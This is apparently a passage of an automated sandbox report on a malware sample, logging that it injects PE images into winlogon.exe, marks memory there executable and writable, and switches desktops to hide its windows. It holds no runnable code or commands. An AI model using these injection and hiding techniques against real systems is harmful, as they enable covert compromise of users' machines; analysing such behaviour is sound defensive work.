Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D301000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D316000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D319000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D31B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D320000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D321000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D336000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D339000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D33B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D340000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D341000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D356000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D359000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D35B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D360000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D361000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D376000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D379000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D37B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D380000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D381000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D396000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D399000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D39B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D400000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D401000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D416000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D419000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D41B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D420000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D421000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D436000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D439000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D43B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D440000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D441000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D456000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D459000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D45B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D460000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D461000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D476000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D479000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D47B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D480000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D481000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D496000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D499000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D49B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D500000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D501000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D516000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D519000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D51B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D520000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D521000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D536000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D539000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D53B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D540000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D541000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D556000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D559000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D55B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D560000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D561000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D576000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D579000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D57B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D580000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D581000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D596000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D599000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D59B000 protect: page execute and read and writeJump to behavior
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)Show sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040BFE7 OpenWindowStationA,SetProcessWindowStation,OpenDesktopA,SetThreadDesktop,CloseDesktop,CloseWindowStation,0_2_0040BFE7
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C940000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C960000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C980000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D100000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D120000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D140000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D160000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D180000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D200000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D220000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D240000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D260000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D280000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D300000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D320000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D340000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D360000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D380000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D420000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D440000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D460000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D480000 value starts with: 4D5AJump to behavior
